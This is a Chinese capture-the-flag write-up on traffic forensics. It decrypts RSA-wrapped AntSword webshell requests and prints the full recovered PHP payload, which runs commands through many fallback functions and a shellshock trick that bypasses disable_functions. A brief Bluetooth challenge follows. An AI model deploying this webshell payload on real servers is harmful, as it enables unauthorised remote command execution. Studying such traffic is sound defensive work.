安恒月赛流量分析

经过一下午的奋战，弄明白了awdshell这道题，下面说一下思路

参考链接：

https://xz.aliyun.com/t/6701
https://mp.weixin.qq.com/s?__biz=MzI0MDI5MTQ3OQ==&mid=2247483852&idx=1&sn=3cd3f667523550d414fad97231eeeaea&chksm=e91c5a34de6bd3223f5c3e69aa12311be39d4c13ee8d222ddb81f97070c74698dc7ae7fcecba&mpshare=1&scene=23&srcid&sharer_sharetime=1572778022447&sharer_shareid=3bdf1b0c76d4c1691e700c57f87d9c0a%23rd
用到的知识：PHP OPENSSL，wireshark抓本地包（npcap），AES，wireshark流量分析、过滤语法、蚁剑RSA

解题过程

导出HTTP对象

首先常规操作就是导出http对象，发现有个upload.php，发现传了个不认识的马，写了公钥，考虑RSA加密。

可以确定，传了个马，思路的重点应该向与马的交互上考虑。

流量分析

通过过滤数据包，确定了上传后的文件命名为1581335771.php，于是在数据包中重点观察与该文件的交互。
使用过滤器，语法：http and ip.dst==139.224.112.182 and http.request.method==POST

按个追踪HTTP数据流看看呗，看看有啥有用的信息没。
追踪29543包的时候，发现了字符串L3Zhci93d3cvaHRtbC9hZG1pbi91cGxvYWQv，可能是base64，解一下发现是/var/www/html/admin/upload/，应该是文件的上传路径。
剩下的HTTP流挨个追踪，返回的数据都是加密后的，返回数据暂时没有什么有用的。于是继续注意发送的数据。
在追踪倒数第二个HTTP流的时候，发现了一些蛛丝马迹。发送的数据那有Y2QgIi92YXIvd3d3L2h0bWwvYWRtaW4vdXBsb2FkIjtjYXQgZmxhZztlY2hvIFtTXTtwd2Q7ZWNobyBbRV0=，经解密后发现是cd “/var/www/html/admin/upload”;cat flag;echo [S];pwd;echo [E]，这里可能藏了flag。所以应该对该数据包发送的数据进行还原。

流量还原

由于导出HTP对象的时候有个公钥，考虑非对称加密（RSA），结合题目给的关键字ant与给出的shell的格式，可以确定这是用蚁剑连的shell，并且发送数据经过了RSA加密。
可以写个脚本把发送的数据还原出来。

<?php
$ant="GmFJzJHcsMOZxeGvb3Ulf4Y8e5RRhttAV1bsfypbvQAJW8IRFcqDVoXtyiclZwz2qXdQN8ivFYNqNxhkwtjbB7OitVLgULBfWlOnwtufxvmbmO4u8WlINbPbf/DbAy0Qx3GjBMFpFzrCkKINOfWQ5JqSD1EPx6sM9Cu1VkX5nus=|nL6Ds9dWn+UW5Jb0JAhoTb4rqPJJKbgcPNJfXLP1AKPbWHVE0JFSjClsnXWmFPXfeqPdKqcYxb/14hEwFzs51N5f6+NowrGHjYT+ObPKXpYxzg0vkCMihUMA7DI2YPUWEyPdvoIFg/bW5S3MommwKN9epOto55dtq6Pnb8NEHzY=|S4ic8EaKa3zEkRd7qsTGDs7uf3qiU1UVZE4fheQz3iq1HkiY6rIvAdtvcmsBF5aJWjdA/U2py1Mz105F2Tzm4dDX2Ag/rhX4ysiP8NJDEp+I55R0dfJu6szTOr3O2OTaUQK7iSYT4PKHjdo+rgeHK3hWzzMFAs6i2R9E81vz9WE=|FNCwxF7bDPNgizk4oa7bq4xbIObNCZNYNBdrTLMbYegWZ6FVYi54TLuABR/nkDLXq38cT099hjajM4iY+VL4g8tBRP++4LyPcSyzyC6mDtshAlmQtFteq4sGb+3IilDPekURxQ5RodRGBPtHr+nCNICbgmbqNaYKcVJRfMoK3q8=|m+nGWL1bOFJzaYeT54FtW12U3dWPZk5PJa91+YTtLn9Wg1c8JEf0FzI+YlBtpp6pW0fT7FfbTiJhQsv3f97bb3d+Cs7A5dM/ZG5YXDoDHGhRJKw0+TTHRIm3PH4fnbQNI8zhi5+9t2+0ueujAuXkk8i73A4lH36uKJFloL6yqs8=|YsyuPkbRlpDWwjhlkTThQN9GQXGkkzyNSFoxs5IfsRbbO7ZHphlFhL4yYsRYAgp8MkMJ64x7NfIGoVgDJnA1YgORiJOf8GP/p/28MLOuscy1SVN/lLnJzbhmf/7vfg0/Q94QAEWk2TOgSil0h3JDsgQYqDtFFldHWDnqEvYlWZI=|C2ZaL3MQWCQBmNcq8xAxxlhvXzUxo0qBz2PUIqBIMcKNJ3sgxU+RTqSwYoqPTDAg3//7rNa+dkinRAidD8GjrcSBd5qdbTLQlWZGME9Lv6JEFt0udTU0FVrhV/ctPz+z1NN5P4pN1tj35sNKsyfYH1kq13A+3dYk0wZlMU9KIFI=|l65yWzb3A97Cdu0wdn59Hiag/Um4/LZTrolCjwo9d7/J3Z9stTkaEtLe2XBdVQZsipUfnW2o7JWgQNo0TUbGWIv2H5wKGaTfPm7OTSkm+ao48Nn1d/+yME+RLudQqbmYREMAJFviNJST+H4Q+MqyngjMeGrb5jmlw0eQZ/MUx5Q=|EYwu5Y3rgl8k2KrPZjnGPWjriLI1mDeJwA4KhjvJ4wQs9Xx+ITDsxBr0eMfL/Km95ykbfMlZcrSzonx5hLiE2YLwDjX/cIIZxqzZXkEYq00AdAPrFnhFVdvJn/SHQ1LdGHgAN88Y2EOZOPM8ZXima61BxCY44TlrezIbBj4+eQ0=|Z2/dEUju0jw63PMHCK9CAG+tHmwiH0t3GraGPCes4TZT5hIfv6kHMTOgMthTK6sd5qy+EVw6d1Qxh03WMHVH0gR2aYqEl1RdYwQpN0NPsSM+fETsag3nQ4oV3VniGlaMmdFIiYatNvKNl7tOcapklyxEEIA0Jc33O7FDjUXKiHU=|YEVG5OctKJXP1Z7kywDJGrmb7BvXW/C3iQudtTCLgUIbMhXFq90wLvW7No7ZoqhY/Mh1XlJKtkBZJWEbsORW23hxvA5LCb/edsfJmIxWtj5cRG9g66j3BiEUPDjvtYi6beUjUtKmuSInELTkmIKf1jo5qyZE+VcWC4HfAT0wbFw=|ii/O42J/+ko4xPNfNuunKR7gyji/wtaiMcKMzQM2Qg7KZE/+xAcLX3Znh55OwgsfaTX6AedF+L/1hwMp9zigbvXorSE0TNay//nVlcnhhC4snAu2/hjXNoI3OnnWlfFFLYOj5v+1LN1nCU/UzoHV6/w1/4bVz7Maovj14BfXklI=|eay1qqOy5QmJmStB9EH4JKPms1In5agVigegn5/1IZS+0QpBgK37mWg02rspbMz20brtSgsv2PhJ3gMTFg3ib7z0cQZPvcNV6DTZwSHbUO2M1uQetssYMMnBPPulwLhTkND4SzwSsgDLS6m8TxbHL0qpZRcnNo2sMy478S5DkvM=|e4qLRtta2W6ItXy3HNgpYuQuSSzpsvq+SUfoRKWM8Z5QdiBeleS/YDGP0VZqRJh3CPMC6vbegwB7qNLAt6czTsHQTdTAJBLr5g4oTDc9Sxlk8A7vvK0ljLSgKjNw5s3BDa03jINPkc5BbDkrTaXMq01Bqcu5DPTTA0pO/Z9oq1Q=|RBdZrEGknOK+PCuQ1F2eTxKvAi50XD/Z1ccAItPJ+48VlSbOTZa/wkdr82K8LE56z0E4JtZDBVSj9I4TurU2bbmfCjKXGw9xlagS7YMr/hfyCy/2hrVveAkaBZDAtmnrM4nGpFxVpzArl124XlqEzh9cSS9LAnwkNm8j05D6mDc=|aZpV5K4m1Rwxd/Y9eOfJ0bRpIZybj2tSjuAEJI7Il/EV9ZC0pXLIkgWviG40pXQFGoEwGex7f0j/Je4ldLRKnrpsyZ+/3mZtHnHL4gepf+iVaULQ8jdHTVVnM1t4qLJk+RnhYbuFjcUy5Yo6rn0Cju8sPIdpEwvi8fvetIOGVJE=|fPGROe6VaAwzqmNuk86fnWT4LqandXTwuewTC80zI8xTFSj1S6YMxPROTHS94gXlCcLTfFjEW2VpH2tyANX1FBIw5sSjsuS6CQKuqiQo6ID975H5Ox+KkJs6XLP/l5Or34U3rryHzBooTrXQlDl21qoPBLdj5URgGrEq7wrvLVA=|jp3lUm3Gz2eZpB5zghEGom2syK8nBymkc6h3pKE/mIS8KW6gD2OFSEneFERI0jy26kVOBhxr3ZHY3WoL6s5aJepTuY7D6Dpz/REI+FzR2PlCo0WvyLQdOphMgbYef1SyYr1+DWK/JxxFjxtfVRZlwL7+OyHQjQ05oVHyq6juSEI=|h8tsCCKgjChZ5U/sZxeVPiF8hO+cB6qqfeWnTAMydEcLmR0iwvHcarZw4g2WH2ASvwIN0av4GzLSu2QtOM1u0y/OuVX3v9/Vp+nNMZ/Dog0NUxFIPD1HTgaK3w7DdnA6B6i26JooWAxKlTFgYmr0x7K53pmM6B8wVQu/ADsbFBE=|CdejrTSVZhSgL+3bhPQyuL7ho71i+L8VvpwNg+D84YnKdwbbbfgqIMu+gefCBmyzvhbhEeGR16/T/fZ4bkneak+fzZpgUrejrFbOETG2Rg9zViznPwBdku9FTlWUybaRD0CHKeY7nE93/G2yXWSpuk/7P594cAPi1qd2WnEbaBc=|Hnxjy7ZSfmn6B59Kv7VXu1mhtYdgGbOtsLsLqDX6K1dKhtHsGx0guy03qwqRA0XElDdJ3Dvgqi5lgb8SY6MiDf1c9u870K8S9xVTn6Y0lbZgtvPoDrobEiT6tGEQCRsUuXB6jbUTgnNPmaDAuidQZqdsSBIGZwQyzycgxHmaDuE=|Imz1om4RRCU1Wnyowe5SYFtICyD1BODveyZ497yURKcyMgoogUxi0cPCiyexdD9ciNYk6DGyimegT7zMeIA5oGfNg2EHbzuBJeSc4wqLCJtSmTe66inu3dqC4IDxt2ghkgFLSQZWqNOKOgUt1b5wgy3O/Y3iIzS888TuFSDm+RQ=|jldlrb8EHvWiKi5E/HBIrn4UUnzMZO8+6ugZ7hjZTtWI5Vg9EeWdmITpEpOQIWIXpOUhaI+VydVcom8e7Fe6gR6u4RPy5ChmFgjZhT03gwwNXzJeiaE6x7ZZjXGBZA3Lwu5gRns3s+hTM0Tm2vrhGOQDB41hDDi4N/Yb3MRn0PM=|UJKgd4FCzzzMeQEq+w3S17+3d+g9mM3JM2qZWkWHOIF3L/EiWpRhm18DuaWJ7veqQSA5pb3KGH9rKDvj2KHIDTUHl0gCiH1U5qeD+WqXFvLahN5O8ecrfgflUUip1SdE6aL6dYqzyplxF+qy3BVr2dKq+6UYlUiA5Bmn2lXSIyM=|LClEAJBfCO7HMhlu0ASDbetkR7sP4aOx9a/P4P0L5kLeGYrlrK4Qg3ZNl7Fd/gQ8KXAKs90XRE62pfZidMX1A4xj/IokC6nkXCNUIzi0PWPWdCzcBNiswbQtsTZhElecl8RyfaOSvxsiKclTvKbZYfQI5r0p0asBs5gKnK0FpT4=|paMu+DWwNp+5GRSiGn4QfFaS/ffXXKuBgP/qzsixnnBWMeXIVy/HT23Xdoc7/OdlIH8/rBKdrJt+7o6XUAbRGzND9sEuf0Ldh5npWln/EhSkGq+bqt1hDfmwwsoo2GJcNDHBhz6lQq2M4zoa9E9d04T3N/SE+3B7LFb0cxLE8aA=|Cz+hQca9uYZJPPJusvE1G8X12VF5iPFM83nOnszF38XQziVKd+D83N4IvoJPNdJLEtgbycIpg1bo5auK1u9n2Pv8z1jFHoaTzmPgDBFiAAv3NGd0m2vg09QwRxq84PD9Ey0dwT7C1w2e6M9wGJ6DoIhPhZQgvUKMyrmCAVmMo18=|h59BqEgdFq4a1HegvdVKeMWwiwQMQsaSzYOxbNCiPuCRGknF8dHHkQboB65gnjbNBDPVpiVoDBMDV+1sCc1yM8zqC494bDS7iopf/U3BBnZS2wCxeo1x78DUiEgzP6ILomxrhrMY2y5R9IbmhJQVkpiqMhPaCvvHzOZO6Pz9SHg=|gUSFO4uVnPAI4UVTKCdBqH/rD6BZZFPfhsVOzga0ohjOJhXW+pvAu4GSh+3FIGn6cpxBUILbsLjBSgmscqAbKV/nHRnQ8HjQUgnu5YM8KikKJV35OMt1Mo1P/qlF5bwzI969XDtUHtClPkznXuO4HyvGLj0/mJj0IauhxfDKhyU=|jkhijGHqR86l+YGh7fldHrzLfam9LUYfRt2nrqqgeqCoE6KO8khatGkzLPk8QgIjLti6P6d7AwwPdVLX3gsfv6bBhT26qUR1u5+AA8foNt5tH6Ej33OODcnkxcp19eFu+zWRG1zUDkBs5qtCJvZKnpSPFKxJ6Z2g0RAoKF3pqbY=|QayQ2dVrEz8KBgpVQjGRNbpRHgFhVK3e89fEzEKzlclezrZ7CBgjB6/Y0PPYSIeZldFEZficAzHXs+bFHALEMrkJlRMk36FMuqtn0YVs4cVy8AHxjb8QnJD9gsFC6q2EWmRo8w4ZdBvg1xyeg3D0vhOcZgNk78BGoSU2HhHK5xY=|Ncgk0CAlnik6xDFINohB1EqgT7tS8COpia8O9cuvi53lNlQWY4IWG2oZMgzNWeU/m8QL+EGqhrD6IflJDD/hDO/IFC6D2DEjeMofqJ/6sHXAt2lIV129SeUUjGdrxyxeWDtqu6iBDdDBtyfPVfeI/DMYOh46XkR0Wk5nBU2N7+U=|lOxi5A2Z8sa8+aw5rQm0g6gqukXMlwvLV7ykEiGWFRqFqDaRPnkVI8diKsvgBg0Btk94gXt2FX1polSNgIJL3E6GW9loo2OMSGBBg1KJ/6VC/DpLWy44VbZhrUB//hiXo3xua6h2DRDi4h5eFkkf2ZIjGjZBi+AqHQINUbetN54=|DRBn6EF3Eoj+wpOX2xhKhkrypPB+d2+8PyHzXwKL8QmOeaRufeCZ1/7Id4TQPXiRXOYsPDXVLr1tUWAUNfqIQisGxSL8lAgg9LzYNYxRUejuTsP2WmVSO21cYXTPlNYjJDR+BkTtOlAvBBp3fjwhOVlr1khuzAhl2Y799drdSFk=|VIJ6dfEfxNcc1eWhAL0dMWXkGSCnBqv+I+Hqs7mGdK9CG3sMH1LyhIEsYg/UPccftYAPeIqKitOpj4OlNbGQMlf8AIJgFvNceAl7HCwqf/6ggZzfcBx5r4HpCBI3cB2zOOOlX9AFVRcunk3rCZSsaeQ8QGsLC1q/2EImzQqSB5g=";
$pk = <<<EOF
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCmXoXBvXeanxgl51HBm2J6HPNh
TQtfb8ICioE+n0Ni0DlBFHSBprbsWYKJywVfdhJbLDCCon68uA1UYuy0yteDog3j
OdweW2bscEGmeMXLQJfBHpQrg4wWoYJjD3QsKorYT6kdp1LRkuHE3PbpqvRtqO7A
LzrcBi88Eu7oZaPANwIDAQAB
-----END PUBLIC KEY-----
EOF;
$cmds = explode("|", $ant);
$pk = openssl_pkey_get_public($pk);
$cmd = '';
foreach ($cmds as $value) {
  if (openssl_public_decrypt(base64_decode($value), $de, $pk)) {
    $cmd .= $de;
  }
}
print_r($cmd);
?>

还原后的数据是:

@ini_set("display_errors", "0");@set_time_limit(0);function asenc($out){@session_start();$key=@substr(str_pad(session_id(),16,'a'),0,16);return @base64_encode(openssl_encrypt(base64_encode($out), 'AES-128-ECB', $key, OPENSSL_RAW_DATA));};;function asoutput(){$output=ob_get_contents();ob_end_clean();echo "f3c7239848e0";echo @asenc($output);echo "05fda2646c";}ob_start();try{$p=base64_decode($_POST["t185a78b977a47"]);$s=base64_decode($_POST["wd0b7c7ca226cb"]);$envstr=@base64_decode($_POST["b8dcb72ce2ba93"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";if(substr($d,0,1)=="/"){@putenv("PATH=".getenv("PATH").":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin");}else{@putenv("PATH=".getenv("PATH").";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;");}if(!empty($envstr)){$envarr=explode("|||asline|||", $envstr);foreach($envarr as $v) {if (!empty($v)) {@putenv(str_replace("|||askey|||", "=", $v));}}}$r="{$p} {$c}";function fe($f){$d=explode(",",@ini_get("disable_functions"));if(empty($d)){$d=array();}else{$d=array_map('trim',array_map('strtolower',$d));}return(function_exists($f)&&is_callable($f)&&!in_array($f,$d));};function runshellshock($d, $c) {if (substr($d, 0, 1) == "/" && fe('putenv') && (fe('error_log') || fe('mail'))) {if (strstr(readlink("/bin/sh"), "bash") != FALSE) {$tmp = tempnam(sys_get_temp_dir(), 'as');putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1");if (fe('error_log')) {error_log("a", 1);} else {mail("a@127.0.0.1", "", "", "-bv");}} else {return False;}$output = @file_get_contents($tmp);@unlink($tmp);if ($output != "") {print($output);return True;}}return False;};function runcmd($c){$ret=0;$d=dirname($_SERVER["SCRIPT_FILENAME"]);if(fe('system')){@system($c,$ret);}elseif(fe('passthru')){@passthru($c,$ret);}elseif(fe('shell_exec')){print(@shell_exec($c));}elseif(fe('exec')){@exec($c,$o,$ret);print(join(" ",$o));}elseif(fe('popen')){$fp=@popen($c,'r');while(!@feof($fp)){print(@fgets($fp,2048));}@pclose($fp);}elseif(fe('proc_open')){$p = @proc_open($c, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);while(!@feof($io[1])){print(@fgets($io[1],2048));}while(!@feof($io[2])){print(@fgets($io[2],2048));}@fclose($io[1]);@fclose($io[2]);@proc_close($p);}elseif(fe('antsystem')){@antsystem($c);}elseif(runshellshock($d, $c)) {return $ret;}elseif(substr($d,0,1)!="/" && @class_exists("COM")){$w=new COM('WScript.shell');$e=$w->exec($c);$so=$e->StdOut();$ret.=$so->ReadAll();$se=$e->StdErr();$ret.=$se->ReadAll();print($ret);}else{$ret = 127;}return $ret;};$ret=@runcmd($r." 2>&1");print ($ret!=0)?"ret={$ret}":"";;}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();

代码审计

在这一串代码中可以发现有几个关键函数：asenc(),asoutput(),发现输出的内容是f3c7239848e0+asenc($output)+05fda2646c，asenc里面是用AES-128-ECB加密，key是session前16位，去包里找就行。

数据还原

接下来需要做的就是还原数据，通过代码审计可以知道base64(AES加密（base64(out)）)后的内容是+L8pc9pJEhqPQ1cmL18eJXX9QGADkKnp8A1j7s4oX2Qo8YJNGNTbuaXu+OfynYgRewqyfLj/Wrg0rgKj/cRdO4zJMmfLfyFVB4pBRYeTetM0G/w/Px6+xI/WPlRrx/+MvK6eQyPr+xDqTX82AqiGrOYDwN94/vuGcLS7NAxhty4=
把这个解密就行了。解密方法：

$res=base64_decode("+L8pc9pJEhqPQ1cmL18eJXX9QGADkKnp8A1j7s4oX2Qo8YJNGNTbuaXu+OfynYgRewqyfLj/Wrg0rgKj/cRdO4zJMmfLfyFVB4pBRYeTetM0G/w/Px6+xI/WPlRrx/+MvK6eQyPr+xDqTX82AqiGrOYDwN94/vuGcLS7NAxhty4=");
$res=openssl_decrypt($payload, 'AES-128-ECB', $k,OPENSSL_RAW_DATA)

然后再做两次base64解密就可以得到flag了。(cat flag里面的文件也是base64加密的)

题目总结

这道题有点麻烦，主要是不了解蚁剑的流量特征。在awd中shell的免杀与waf永远是在不断迭代升级的。还需要学习的姿势有很多，应该多分析流量，总结特点。

蓝牙数据包

蓝牙这道题我一开始看到没什么思路，因为没有学过蓝牙相关的协议。于是从网上现学了点，发现传输数据使用的协议，搜了搜协议名还真搜出来个.7z文件。
搜出来之后把这玩意十六进制导入到010editor还原成.7z，提示需要输入密码，首先考虑伪加密，发现不是（其实360会自动修复伪加密）然后看文件名提示了密码是蓝牙的PIN，
于是在包中搜索“PIN”。
第一次搜索其实我搜到了。。但是没找到PIN,刚想爆破（PIN纯数字，位数少，好爆破）的时候朋友说你搜”PIN”就行。。。我。。吐了。
搜到PIN之后解压文件得到flag。